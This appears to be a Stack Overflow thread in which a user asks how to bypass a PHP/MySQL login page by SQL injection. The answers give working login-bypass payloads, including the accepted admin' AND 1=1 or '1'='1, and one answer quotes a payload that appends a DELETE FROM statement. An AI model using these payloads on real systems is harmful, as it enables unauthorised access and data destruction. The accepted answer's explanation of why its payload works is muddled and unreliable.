# Is sql injection possible for php code below?

Tags: php, mysql, sql-injection

```
$sql_checkpasswd = "SELECT user_id, username, user_password, user_active
FROM " . USERS_TABLE . "
WHERE username = '" . $username . "'" . " AND user_password = '" . md5($password). "'";
```

Above is how my php code is written. This is for a login page.

How can use sql injection technique to login without knowing password?

Thanks

I tried all possible combinations
' OR '1=1'

' OR '1=1' --

admin');#

and all usual one's.

Error for one of the query: http://prntscr.com/53bmv8

P.s.: I have spent a great deal of time doing research on the subject and tried many different methods, which is why I am posting this question in order to get some help. I'm new at sql injection.

Comment: Don't forget the space after `--`

Comment: you should use sqlmap or some other auto injection tool to check :)

Comment: I'll check that out too. I know about havij, but couldnt download that the link wasnt working. Thanks

Comment: You should do `var_dump()`'s of the complete sql queries with the input you have tried to see if they are what you expect them to be and to try them directly in mysql.

Comment: It works directly in mysql without any issues. But not with the php code. I'm doing something wrong may be understanding the quotes

Comment: *"PS : DONT DOWNVOTE and go away! I did all my research and tried everything and then i'm posting this to get some help. I'm a noob at sql injection. Help rather than demotivating!"* - I did **not** downvote, but that really isn't helping your cause. You should remove it and just state that you have done your research; period. You shouldn't fly off on a tangent like that.

Comment: Alright done. Sorry, i got frustrated.  I hate it when people dont care to answer and downvote and just go away. I know how SO works and never post without research.

Comment: When you write out a question, put yourself in the other person's shoes and how "you" would like to be addressed, just a quick PR tip ;) I have no doubt that you've done your research and I believe you. Why people downvoted, I have no idea if it's because of your initial question without the rant or after. People can be strange animals at times. As for how to get you some success, that I couldn't help you with, I've never really tried doing injections, because I always use prepared statements and XSS injection prevention. I hope you get your answer, *cheers*. @TheUknown

Comment: is `$username` the raw posted data, or is it manipulated? If so, how is it being manipulated?

Comment: @ʰᵈˑ $username is raw posted

Comment: @TheUknown See this answer http://stackoverflow.com/a/26474943/ it may help.

Comment: Thanks @Fred-ii-, you have been great help. I finally figured this out. I added it as the answer. But, you are amazing! :)

Comment: @TheUknown You're welcome, glad to know you've found your solution. +1

Answer (score 2, accepted):

I finally figured this out, might help someone else having same question:

Enter this in username field:

```
admin' AND 1=1 or '1'='1
```

Above username works fine, I dont have to enter password and can leave it blank since the query becomes

```
$username= admin' AND 1=1 OR '1'='1 AND $password = anything
```

Even if one condition is satisfied in above query, i get the access and the username part is `True` since `1=1`AND admin is an existing username

Comment: Good job. Keep in mind, that you cannot check the password in the SQL directly, as soon as your password becomes salted. So switch to the [password_hash()](http://www.php.net/manual/en/function.password-hash.php) function for hashing, read the hash from the database and afterwards verify the hash in PHP with [password_verify()](http://www.php.net/manual/en/function.password-verify.php).

Answer (score 0):

Try the following input:

```
' OR '1=1' LIMIT 1 --
```

including a space after `--` which does not show up here, for some reason.

Comment: @Fred -ii- I tried what you said and got this : http://prntscr.com/53bmv8
And if i include space like you said, it didnt work

Comment: Please try ' OR 1=1 LIMIT 1 -- '

Answer (score 0):

I copy some example that hope hep you

**Java Original**: “SELECT * FROM users_table WHERE username=” + “’” + username + “’” + “ AND password = “ + “’” + password + “’”;

•**Inserted Password**: Aa’ OR ‘’=’

•**Java Result**: “SELECT * FROM users_table WHERE username=’anyname’ AND password = ‘Aa’ OR ‘ ‘ = ‘ ‘;

•**Inserted Password**: foo’;DELETE FROM users_table WHERE username LIKE ‘%

•**Java Result**: “SELECT * FROM users_table WHERE username=’anyname’ AND password = ‘foo’; DELETE FROM users_table WHERE username LIKE ‘%’

Comment: This looks good. But in this case, I need to know the username or this wont work because its an `AND` condition and both need to be true. I've tried all i.e. using ' OR '1=1' in username and password too and many more combinations, but nothing worked. Check my answer to see the solution that worked. I appreciate your time for answering this. Thanks